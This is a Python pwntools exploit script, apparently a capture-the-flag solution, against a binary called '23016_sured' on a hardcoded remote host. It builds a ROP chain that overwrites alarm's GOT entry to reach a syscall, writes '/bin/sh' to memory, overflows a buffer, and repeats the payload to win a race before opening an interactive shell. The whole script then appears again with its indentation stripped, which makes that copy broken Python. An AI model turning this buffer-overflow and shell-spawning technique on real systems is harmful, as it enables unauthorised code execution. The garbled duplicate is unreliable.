hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window

# libc = ELF('./libc.so.6')
elf = ELF('./23016_sured')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "13.112.146.72"
RPORT = 20004
LHOST = "127.0.0.1"
LPORT = 20004

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    b *0x4013fd
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./23016_sured'], gdbscript=gdbscript)
else:
    conn = process(['./23016_sured'])
    # conn = process(['./23016_sured'], env={'LD_PRELOAD': './libc.so.6'})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

# 0x00402c83: pop rdi ; ret  ;  (1 found)
# 0x00402c81: pop rsi ; pop r15 ; ret  ;  (1 found)
# 0x004022a0: pop rsi ; pop rbp ; ret  ;  (1 found)
# 0x00402c7d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret  ;  (1 found)
# 0x00402566: mov qword [rbp-0x08], rdi ; nop  ; pop rbp ; ret  ;  (1 found)
# 0x0040255c: mov rax, qword [rbp-0x08] ; pop rbp ; ret  ;  (1 found)
# 0x004025c4: mov edx, dword [rbp-0x18] ; mov qword [rax+0x08], rdx ; nop  ; pop rbp ; ret  ;  (1 found)
pop_rdi = 0x00402c83
pop_rsi_r15 = 0x00402c81
pop_rbp = 0x00401200
mov_rbp = 0x00402566
rax_set = 0x0040255c
set_edx = 0x004025c4


rop = ''
# overwrite got of alarm to call syscall instruction
rop += p64(pop_rbp) + p64(0x0000000006050e9+8) + p64(pop_rdi) + p64(0x0500000000000000) +  p64(mov_rbp) + p64(0xdeadbeef)
# write "/bin/sh" to writable memory
rop += p64(pop_rbp) + p64(0x000000000605f00+8) + p64(pop_rdi) + p64(0x68732f6e69622f) +  p64(mov_rbp) + p64(0xdeadbeef)
# for set edx = 0
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(0x000000000605f00+8) +  p64(mov_rbp) + p64(0xdeadbeef)
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8
# edx = 0
rop += p64(pop_rbp) + p64(0x605630+0x18) + p64(set_edx) + 'x'*8
# write 59 (execve syscall number) to writable memory
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(59) +  p64(mov_rbp) + p64(0x605430 + 0x18)
# rax = 59
rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8
# rdi = &"/bin/sh", rsi = 0
rop += p64(pop_rdi) + p64(0x000000000605f00) + p64(pop_rsi_r15) + p64(0x00)*2
# call alarm@plt
rop +=  p64(0x401160)
payload = 'x'*0x118 + rop

# attempt race conditon
for i in range(100):
    conn.sendline('1')
    conn.sendline(payload)

conn.sendline('LEAVE')
conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window

	# libc = ELF('./libc.so.6')
	elf = ELF('./23016_sured')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "13.112.146.72"
	RPORT = 20004
	LHOST = "127.0.0.1"
	LPORT = 20004

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	b *0x4013fd
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./23016_sured'], gdbscript=gdbscript)
	else:
	conn = process(['./23016_sured'])
	# conn = process(['./23016_sured'], env={'LD_PRELOAD': './libc.so.6'})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')

	# 0x00402c83: pop rdi ; ret ; (1 found)
	# 0x00402c81: pop rsi ; pop r15 ; ret ; (1 found)
	# 0x004022a0: pop rsi ; pop rbp ; ret ; (1 found)
	# 0x00402c7d: pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret ; (1 found)
	# 0x00402566: mov qword [rbp-0x08], rdi ; nop ; pop rbp ; ret ; (1 found)
	# 0x0040255c: mov rax, qword [rbp-0x08] ; pop rbp ; ret ; (1 found)
	# 0x004025c4: mov edx, dword [rbp-0x18] ; mov qword [rax+0x08], rdx ; nop ; pop rbp ; ret ; (1 found)
	pop_rdi = 0x00402c83
	pop_rsi_r15 = 0x00402c81
	pop_rbp = 0x00401200
	mov_rbp = 0x00402566
	rax_set = 0x0040255c
	set_edx = 0x004025c4


	rop = ''
	# overwrite got of alarm to call syscall instruction
	rop += p64(pop_rbp) + p64(0x0000000006050e9+8) + p64(pop_rdi) + p64(0x0500000000000000) + p64(mov_rbp) + p64(0xdeadbeef)
	# write "/bin/sh" to writable memory
	rop += p64(pop_rbp) + p64(0x000000000605f00+8) + p64(pop_rdi) + p64(0x68732f6e69622f) + p64(mov_rbp) + p64(0xdeadbeef)
	# for set edx = 0
	rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(0x000000000605f00+8) + p64(mov_rbp) + p64(0xdeadbeef)
	rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8
	# edx = 0
	rop += p64(pop_rbp) + p64(0x605630+0x18) + p64(set_edx) + 'x'*8
	# write 59 (execve syscall number) to writable memory
	rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(pop_rdi) + p64(59) + p64(mov_rbp) + p64(0x605430 + 0x18)
	# rax = 59
	rop += p64(pop_rbp) + p64(0x000000000605f10+8) + p64(rax_set) + 'x'*8
	# rdi = &"/bin/sh", rsi = 0
	rop += p64(pop_rdi) + p64(0x000000000605f00) + p64(pop_rsi_r15) + p64(0x00)*2
	# call alarm@plt
	rop += p64(0x401160)
	payload = 'x'*0x118 + rop

	# attempt race conditon
	for i in range(100):
	conn.sendline('1')
	conn.sendline(payload)

	conn.sendline('LEAVE')
	conn.interactive()